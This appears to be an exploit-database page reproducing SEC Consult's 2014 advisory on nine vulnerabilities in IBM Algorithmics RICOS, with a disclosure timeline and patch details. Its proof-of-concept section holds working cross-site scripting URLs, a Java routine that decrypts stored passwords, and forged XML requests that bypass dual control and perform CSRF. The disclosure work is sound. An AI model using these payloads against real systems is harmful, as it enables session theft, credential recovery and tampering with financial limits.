Menu

Improved exploit search engine. Try it out

"IBM Algorithmics RICOS 4.5.0 < 4.7.0 - Multiple Vulnerabilities"

Author

"SEC Consult"

Platform

jsp

Release date

2014-07-01

Release Date Title Type Platform Author
2019-06-11 "Liferay Portal 7.1 CE GA=3 / SimpleCaptcha API - Cross-Site Scripting" webapps jsp "Valerio Brussani"
2019-06-05 "Zimbra < 8.8.11 - XML External Entity Injection / Server-Side Request Forgery" webapps jsp k8gege
2019-05-10 "dotCMS 5.1.1 - HTML Injection" webapps jsp "Ismail Tasdelen"
2019-03-11 "OpenKM 6.3.2 < 6.3.7 - Remote Command Execution (Metasploit)" webapps jsp AkkuS
2019-02-19 "Zoho ManageEngine Netflow Analyzer Professional 7.0.0.2 - Path Traversal / Cross-Site Scripting" webapps jsp "Rafael Pedrero"
2019-02-18 "Zoho ManageEngine ServiceDesk Plus (SDP) < 10.0 build 10012 - Arbitrary File Upload" webapps jsp "Dao Duy Hung"
2018-10-30 "Microstrategy Web 7 - Cross-Site Scripting / Directory Traversal" webapps jsp "Rafael Pedrero"
2018-04-16 "Sophos Cyberoam UTM CR25iNG - 10.6.3 MR-5 - Direct Object Reference" webapps jsp Frogy
2018-02-22 "Trend Micro Email Encryption Gateway 5.5 (Build 1111.00) - Multiple Vulnerabilities" webapps jsp "Core Security"
2017-10-09 "Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (2)" webapps jsp intx0x80
2017-10-02 "OpenText Document Sciences xPression 4.5SP1 Patch 13 - 'documentId' SQL Injection" webapps jsp "Marcin Woloszyn"
2017-10-02 "OpenText Document Sciences xPression 4.5SP1 Patch 13 - 'jobRunId' SQL Injection" webapps jsp "Marcin Woloszyn"
2017-08-18 "Symantec Messaging Gateway 10.6.3-2 - Root Remote Command Execution" webapps jsp "Philip Pettersson"
2017-08-09 "DALIM SOFTWARE ES Core 5.0 build 7184.1 - Server-Side Request Forgery" webapps jsp LiquidWorm
2017-08-09 "DALIM SOFTWARE ES Core 5.0 build 7184.1 - Directory Traversal" webapps jsp LiquidWorm
2017-08-09 "DALIM SOFTWARE ES Core 5.0 build 7184.1 - Cross-Site Scripting / Cross-Site Request Forgery" webapps jsp LiquidWorm
2017-08-09 "DALIM SOFTWARE ES Core 5.0 build 7184.1 - User Enumeration" webapps jsp LiquidWorm
2017-08-01 "Advantech SUSIAccess < 3.0 - 'RecoveryMgmt' File Upload" webapps jsp "James Fitts"
2017-08-01 "Advantech SUSIAccess < 3.0 - Directory Traversal / Information Disclosure (Metasploit)" webapps jsp "James Fitts"
2017-07-19 "Oracle E-Business Suite 12.x - Server-Side Request Forgery" webapps jsp "Sarath Nair"
2017-04-25 "Oracle E-Business Suite 12.2.3 - 'IESFOOTPRINT' SQL Injection" webapps jsp ERPScan
2017-03-27 "Nuxeo 6.0/7.1/7.2/7.3 - Remote Code Execution (Metasploit)" webapps jsp Sysdream
2017-05-24 "NetGain EM 7.2.647 build 941 - Authentication Bypass / Local File Inclusion" webapps jsp f3ci
2018-01-05 "Gespage 7.4.8 - SQL Injection" webapps jsp Sysdream
2017-03-10 "Kinsey Infor/Lawson / ESBUS - SQL Injection" webapps jsp "Michael Benich"
2017-02-23 "NetGain Enterprise Manager 7.2.562 - 'Ping' Command Injection" webapps jsp MrChaZ
2017-01-04 "Atlassian Confluence < 5.10.6 - Persistent Cross-Site Scripting" webapps jsp "Jodson Santos"
2018-01-15 "Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect" webapps jsp "Andrew Gill"
2016-08-31 "ZKTeco ZKAccess Security System 5.3.1 - Persistent Cross-Site Scripting" webapps jsp LiquidWorm
2016-08-31 "ZKTeco ZKBioSecurity 3.0 - 'visLogin.jsp' Local Authentication Bypass" webapps jsp LiquidWorm
Release Date Title Type Platform Author
2019-05-13 "OpenProject 5.0.0 - 8.3.1 - SQL Injection" webapps php "SEC Consult"
2018-08-16 "Pimcore 5.2.3 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery" webapps php "SEC Consult"
2018-07-13 "Zeta Producer Desktop CMS 14.2.0 - Remote Code Execution / Local File Disclosure" webapps php "SEC Consult"
2018-07-13 "WAGO e!DISPLAY 7300T - Multiple Vulnerabilities" webapps php "SEC Consult"
2018-07-05 "ADB Broadband Gateways / Routers - Authorization Bypass" webapps hardware "SEC Consult"
2018-05-16 "RSA Authentication Manager 8.2.1.4.0-build1394922 / < 8.3 P1 - XML External Entity Injection / Cross-Site Flashing / DOM Cross-Site Scripting" webapps java "SEC Consult"
2018-04-24 "WSO2 Carbon / WSO2 Dashboard Server 5.3.0 - Persistent Cross-Site Scripting" webapps java "SEC Consult"
2018-03-13 "SecurEnvoy SecurMail 9.1.501 - Multiple Vulnerabilities" webapps aspx "SEC Consult"
2018-03-05 "ClipBucket < 4.0.0 - Release 4902 - Command Injection / File Upload / SQL Injection" webapps php "SEC Consult"
2017-12-07 "OpenEMR 5.0.0 - OS Command Injection / Cross-Site Scripting" webapps php "SEC Consult"
2017-10-18 "Afian AB FileRun 2017.03.18 - Multiple Vulnerabilities" webapps php "SEC Consult"
2017-10-18 "Linksys E Series - Multiple Vulnerabilities" webapps cgi "SEC Consult"
2017-05-09 "I_ Librarian 4.6/4.7 - Command Injection / Server Side Request Forgery / Directory Enumeration / Cross-Site Scripting" webapps php "SEC Consult"
2017-03-22 "Solare Datensysteme Solar-Log Devices 2.8.4-56/3.5.2-85 - Multiple Vulnerabilities" webapps hardware "SEC Consult"
2017-03-08 "Navetti PricePoint 4.6.0.0 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery" webapps multiple "SEC Consult"
2017-03-01 "Aruba AirWave 8.2.3 - XML External Entity Injection / Cross-Site Scripting" webapps xml "SEC Consult"
2016-10-11 "RSA Enterprise Compromise Assessment Tool 4.1.0.1 - XML External Entity Injection" webapps xml "SEC Consult"
2016-07-25 "Micro Focus Filr 2 2.0.0.421/1.2 1.2.0.846 - Multiple Vulnerabilities" webapps java "SEC Consult"
2016-02-10 "Yeager CMS 1.2.1 - Multiple Vulnerabilities" webapps php "SEC Consult"
2015-12-10 "Skybox Platform < 7.0.611 - Multiple Vulnerabilities" webapps hardware "SEC Consult"
2015-06-30 "Polycom RealPresence Resource Manager < 8.4 - Multiple Vulnerabilities" webapps hardware "SEC Consult"
2015-01-26 "Symantec Data Center Security - Multiple Vulnerabilities" webapps multiple "SEC Consult"
2015-01-14 "Ansible Tower 2.0.2 - Multiple Vulnerabilities" webapps multiple "SEC Consult"
2014-12-23 "NetIQ Access Manager 4.0 SP1 - Multiple Vulnerabilities" webapps jsp "SEC Consult"
2014-11-06 "Symantec Endpoint Protection 12.1.4023.4080 - Multiple Vulnerabilities" webapps jsp "SEC Consult"
2014-07-16 "BitDefender GravityZone 5.1.5.386 - Multiple Vulnerabilities" webapps linux "SEC Consult"
2014-07-14 "Shopizer 1.1.5 - Multiple Vulnerabilities" webapps php "SEC Consult"
2014-07-01 "IBM Algorithmics RICOS 4.5.0 < 4.7.0 - Multiple Vulnerabilities" webapps jsp "SEC Consult"
2014-06-09 "WebTitan 4.01 (Build 68) - Multiple Vulnerabilities" webapps php "SEC Consult"
2014-04-24 "WD Arkeia Virtual Appliance 10.2.9 - Local File Inclusion" webapps php "SEC Consult"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/33942/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/33942/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/33942/34299/ibm-algorithmics-ricos-450-470-multiple-vulnerabilities/download/", "exploit_id": "33942", "exploit_description": "\"IBM Algorithmics RICOS 4.5.0 < 4.7.0 - Multiple Vulnerabilities\"", "exploit_date": "2014-07-01", "exploit_author": "\"SEC Consult\"", "exploit_type": "webapps", "exploit_platform": "jsp", "exploit_port": null}
                                            

For full documentation follow the link above

blog comments powered by Disqus

Browse exploit DB API Browse

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SEC Consult Vulnerability Lab Security Advisory < 20140630-0 >
=======================================================================
              title: Multiple severe vulnerabilities
            product: IBM Algorithmics RICOS
 vulnerable version: 4.5.0 - 4.7.0
      fixed version: 4.7.0.03
         CVE number: CVE-2014-0894
                     CVE-2014-0871
                     CVE-2014-0870
                     CVE-2014-0869
                     CVE-2014-0868
                     CVE-2014-0867
                     CVE-2014-0866
                     CVE-2014-0865
                     CVE-2014-0864
             impact: critical
           homepage: http://www-01.ibm.com/software/analytics/algorithmics/
              found: 2013-12-19
                 by: A. Kolmann, V. Habsburg-Lothringen, F. Lukavsky
                     SEC Consult Vulnerability Lab
                     https://www.sec-consult.com
=======================================================================

Vendor description:
- -------------------
IBM Algorithmics software enables financial institutions and corporate
treasuries to make risk-aware business decisions. Supported by a global
team of risk experts based in all major financial centers, IBM
Algorithmics solution offerings include market, credit and liquidity risk,
as well as collateral and capital management.

Source: http://www-01.ibm.com/software/analytics/algorithmics/

RICOS is a pre-deal limit management solution part of the Algo Suite.


Business recommendation:
- ------------------------
The identified vulnerabilities affect integrity and confidentiality of the
risk management system. SEC Consult does not recommend to rely on RICOS as
part of risk management until a thorough security review has been performed
by security professionals. As a workaround, access should be limited only to
trusted users internally and sample checks regarding the plausibility of limits
should be performed manually.


Vulnerability overview/description:
- -----------------------------------
1) Information Disclosure (PSIRT#1440 / CVE-2014-0871 / CVSS 4.3)
The Tomcat configuration discloses technical details within error messages to
the user, which allows an attacker to collect valuable data about the
environment of the solution.

2) Password Disclosure (PSIRT#1441 / CVE-2014-0894 / CVSS 3.5)
The password and the username of the backend database are disclosed in
clear-text to the user of the web application. This allows attackers to
directly connect to the backend database and manipulate arbitrary data stored
in the database (e.g. limits).

3) Non-permanent Cross-Site Scripting (PSIRT#1442 / CVE-2014-0870 / CVSS 4.3)
Several parameters in the RICOS web front end and the Blotter are not properly
sanitized and cause Cross-Site Scripting vulnerabilities. Attackers can steal
user sessions and impersonate other users while performing arbitrary actions
on behalf of the victim user.

4) Broken Encryption (PSIRT#1443 / CVE-2014-0869 / CVSS 4.3)
Weak cryptographic algorithms, being used to store and transfer
user's passwords, allow an attacker to retrieve the plain-text passwords
without further knowledge of cryptographic keys.

5) Manipulation of read-only data / dual control mechanism bypass (PSIRT#1444 / CVE-2014-0868 /
CVSS 3.5)
Several fields of stored data within RICOS are marked as read-only in the web
application, disallowing modification of certain fields. These checks are only
performed client-side, allowing an attacker to alter arbitrary data. An
attacker can create a limit, alter the username of the created limit and
confirm the limit himself, circumventing dual control mechanisms advertised by
RICOS.

6) Cross-Site Cookie Setting (PSIRT#1445 / CVE-2014-0867 / CVSS 4.3)
A vulnerable page in RICOS allows an attacker to set and overwrite arbitrary
cookies for a user that clicks on a manipulated link.

7) Plain-text submission of passwords (PSIRT#1446 / CVE-2014-0866 / CVSS 4.3)
The RICOS fat client submits user credentials in plain-text. An attacker with
access to the network communication can perform man-in-the-middle attacks and
steal user credentials.
This vulnerability also applies to the Blotter, where authentication is
performed unencrypted.

8) Client-side Input Validation (PSIRT#1447 / CVE-2014-0865 / CVSS 3.5)
The RICOS fat client performs input validation only client-side. This allows
an attacker to alter arbitrary data. An attacker can create a limit, alter
the username of the created limit and confirm the limit himself, circumventing
dual control mechanisms advertised by RICOS.

9) Cross-Site Request Forgery (PSIRT#1448 / CVE-2014-0864 / CVSS 4.3)
The web application does not verify that requests are made only from within
the web application, allowing an attacker to trick users into performing
requests to the web application. This allows an attacker to perform tasks on
behalf of the victim user like modifying limits.


Proof of concept:
- -----------------
1) Information Disclosure
The following URL causes a status 404, disclosing the Tomcat version:
https://ricos/ricos470/classes/

If control characters (i.e. \x00) are sent as part of the cookie, a stack trace
is triggered

2) Password Disclosure
The following request sent by the client during regular communication shows the
database connection settings including the username and the password in
clear-text.

POST /ricos470/Executer HTTP/1.1
Host: ricos

...SNIP...
<i n="URN" v=""/><i n="SecServiceURN" v="obsv2:ricos:20100"/><i n="SecSource" v="LM web"/><i
n="SecTimeout" v="7200"/><i n="AcsAutoReconnect" v="Y"/><i n="AcsFunctionLimits" v=""/></t><t
n="ObServer"><i n="UserId" v=""/><i n="Password" v=""/><i n="Host" v="ricos"/><i n="Port"
v="20100"/><i n="CollectionId" v=""/><i n="DbName" v="RICA"/><i n="Location" v="RICA"/><i
n="DbType" v="ORA"/><i n="Application" v="RICOS"/><i n="AppId" v="LM web"/><i n="AppDesc" v=""/><i
n="AppVer" v="4.7.0"/><i n="Component" v="RICOS Gui"/><i n="DbUser" v="rica"/><i n="DbPass"
v="password"/>
...SNIP...

3) Non-permanent Cross-Site Scripting
The following URLs demonstrate Cross-Site Scripting vulnerabilities:

POST /ricos470/rcore6/main/showerror.jsp HTTP/1.1
Host: ricos

Message=<script>alert(document.cookie)</script>%0D%0A&Stack=java.lang....

https://ricos/ricos470/rcore6/main/buttonset.jsp?ButtonsetClass=x";+alert(document.cookie);//x

https://ricos/ricos470/rcore6/frameset.jsp?PROF_NAME=&Caller=login&ChildBrowser=Y&MiniBrowse=Y&OBJECT=profile_login&CAPTION_SELECT=MNU_PROFILE_VIEW&MBName=profile_login')");alert(document.cookie);//

http://ricos/algopds/rcore6/main/browse.jsp?Init=N";alert(document.cookie)&Name=trades&StoreName=trades&HandlerFrame=Caption&ShowStatus=N&HasMargin=Y


http://ricos/algopds/rcore6/main/ibrowseheader.jsp?Name=trades;alert(document.cookie)&StoreName=trades;alert(document.cookie)&STYLESHEET=browse"/><script>alert(document.cookie)</script>

4) Broken Encryption
The user's password is transported frequently in requests within the application.
The following function decrypts the password without requiring any cryptographic key:

public static void decrypt(String string)
{
  int nRadix = 32;
  int nR2 = nRadix * nRadix / 2;
  GregorianCalendar cal = new GregorianCalendar();
  String key = string.substring(0, 2);
  int nKey = Integer.parseInt(key, 32);
  
  String encPw = string.substring(2, string.length());
  int y = 0;
  for (int i = 0; i < encPw.length(); i+=2)
  {
    String aktuell = encPw.substring(i,i+2);  
    int new_value = Integer.parseInt(aktuell, 32);
    int character = - nKey * (y + 1) % nR2 + new_value;
    char decrypt = (char) character;
    System.out.print(decrypt);
    y = y + 1;
  }    
}

5) Manipulation of read-only data  / dual control mechanism bypass
The following example illustrates how to manipulate a request so that the server
saves it on behalf of another user (only the relevant parts are shown):

<?xml version="1.0" encoding="UTF-8"?>
<ds>
  <t n="Service">
    <i n="RequestType" v="#Action"/>
    <t n="#ActionData">
      <i n="#ActionName" v="web.getmeta_udf"/>
      <i n="#Mode" v="#Sync"/>
      <i n="#Request" v="#Execute"/>
      <t n="#OutputData">
        <t n="#MapTable">
          <i n="#ResultData" v="#ResultData"/>
          <i n="#ResultTable" v="#ResultTable"/>
        </t>
      </t>
      <t n="#InputData">
        <t n="#WorkTable">
          <t n="det_limit">
            <i n="SCTYGEID" v="A"/>
[...]
            <i n="LMLCURID" v="other_user"/>
            <i n="LMEQEPSTDA" v=""/>
[...]
            <i n="MFURID" v="other_user"/>
            <i n="LMEVFL" v="N"/>
            <i n="SOLMFL" v="N"/>
[...]
                    <i n="CRURID" v="other_user"/>
                    <i n="MFTS" v=""/>
                    <i n="MFURID" v="other_user"/>
[...]
                    <i n="CRURID" v="other_user"/>
                    <i n="MFTS" v=""/>
[...]
  </t>
  <t n="Session">
    <t n="SessionData">
      <i n="LoginUser" v="other_user"/>
      <i n="LoginPass" v="8HC34BCM5JE84ND95RED"/>
[...]
        <i n="LoginUser v="other_user"/>
        <i n="LoginPWD" v="326K9DC9FNIT3T70A3D6"/>
        <i n="URN" v=""/>
        <i n="SecServiceURN" v="obsv2:ricos:20100"/>
[...]
      </t>
      <t n="ObServer">
        <i n="UserId" v="other_user"/>
        <i n="Password" v=""/>
        <i n="Host" v="ricos"/>
[...]
        <i n="Prefix" v="RICA"/>
        <i n="DbSystem" v="oracle"/>
        <i n="LoginUserId" v="other_user"/>
      </t>
    </t>
  </t>
</ds>

6) Cross-Site Cookie Setting
The following URL allows setting of arbitrary cookies:

https://ricos/ricos470/rcore6/main/addcookie.jsp?test-cookie=cookie-content

7) Plain-text submission of passwords
Neither the fat client nor the Blotter use https to communicate with the
backend server. Both send unencrypted credentials via http during authentication.

8) Client-side Input Validation
By manipulating serialized objects that are transmitted by the fat client,
it is possible to change the user name who created a limit, allowing an attacker
to bypass dual control mechanisms.

9) Cross-Site Request Forgery
The following request, sent on behalf of an authenticated user will e.g.
change the currency of a given deal:

POST http://ricos/ricos470/Executer HTTP/1.1
Host: ricos

<?xml version="1.0" encoding="UTF-8"?>
<ds>
  <t n="Service">
    <i n="RequestType" v="#Action"/>
    <t n="#ActionData">
      <i n="#ActionName" v="web.updrec_msp"/>
      <i n="#Mode" v="#Sync"/>
      <i n="#Request" v="#Execute"/>
      <t n="#InputData">
        <t n="#MapTable">
          <i n="#InputData" v="det_msp"/>
        </t>
        <t n="#WorkTable">
          <t n="det_msp">
            <i n="SYPMID" v="SYS-PAR-ID"/>
            <i n="CUCD" v="USD"/>
            <i n="MIGORILV" v="11"/>
            <i n="ILPLMVFL" v="Y"/>
            <i n="ILNEMVFL" v="Y"/>
            <i n="BSCUONFL" v="N"/>
            <i n="PBSCUOFL" v="N"/>
            <i n="LORICUTEFL" v="N"/>
            <i n="SYSAVAILFL" v="F"/>  
            <i n="CUSTID" v="CUSTOMER"/>
            <i n="CBNALI" v="IS-LOCATED-IN"/>
            <i n="CBNAAG" v="AUTOMATIC-GROUP"/>
            <i n="UDF1" v="Welcome to ricos 4.71"/>
          </t>
...SNIP...


Vulnerable / tested versions:
- -----------------------------
IBM Algorithmics RICOS 4.71


Vendor contact timeline:
- ------------------------
2014-01-24: Contacting vendor through psirt@vnet.ibm.com
2014-01-24: Vendor response, will likely require more than 30 days to resolve issues
            asking for acknowledgements
2014-01-24: Sending acknowledgements
2014-01-29: Vendor assigns PSIRT advisory numbers 1440-1448 to reported issues
2014-02-07: Vendor confirms 8 of 9 vulnerabilities and sends CVE and CVSS
2014-02-10: Providing further information on assumed to be false positive issue 1441
2014-02-14: Telco to clarify vulnerability details and agree on further procedure
            patches are scheduled for end of June 2014
2014-02-20: Vendor confirms issue 1441 to be a vulnerability
2014-05-27: Vendor announces that patches will be released on 2014-06-30
2014-06-26: Vendor published patches and security bulletin
            https://www-304.ibm.com/support/entdocview.wss?uid=swg21675881
2014-06-30: SEC Consult publishes the advisory


Solution:
- ---------
Apply patch ACLM 4.7.0.03 FP5. More information:
https://www-304.ibm.com/support/entdocview.wss?uid=swg21675881


Workaround:
- -----------
Limit access to RICOS and manually perform sample checks regarding the
plausibility of limits.


Advisory URL:
- -------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab

SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius

Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone:   +43 1 8903043 0
Fax:     +43 1 8903043 15

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

Interested to work with the experts of SEC Consult?
Write to career@sec-consult.com

EOF F. Lukavsky / @2014
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/

iQEcBAEBAgAGBQJTsZDnAAoJECyFJyAEdlkKDUIH/3d/PLRdTNA9EludLlr7M+K+
uaBxgyajy8sT7dYMedR3EcxKxZSUGExnv+2X4GZN0Px8a9NvEewURIAiM+ZAsdYg
uFKPtYcuhO6TyKV/QoPUsixEM3IgzyMpGqcf2qtWqNOb4jVpXvtyO2gLoHQNj04F
uQl0v+1it2HNVxd6vEj2zj7neuOLb3WhE6ObDAlVkzcOutvTF84cVyNYpBBuCD6e
0TsopvfkJ3l6iJPSvgXpl1gTmSoR0PfEC14JYVKCK0pTbhXc81J8YYGQnEklWazl
EEUoMVM0I6Yzg9oXGpHf5cBX49pbzAYm5lhJkCDiSQ+2ueSYN0BEz3e2JMtDEZ8=
=OFL7
-----END PGP SIGNATURE-----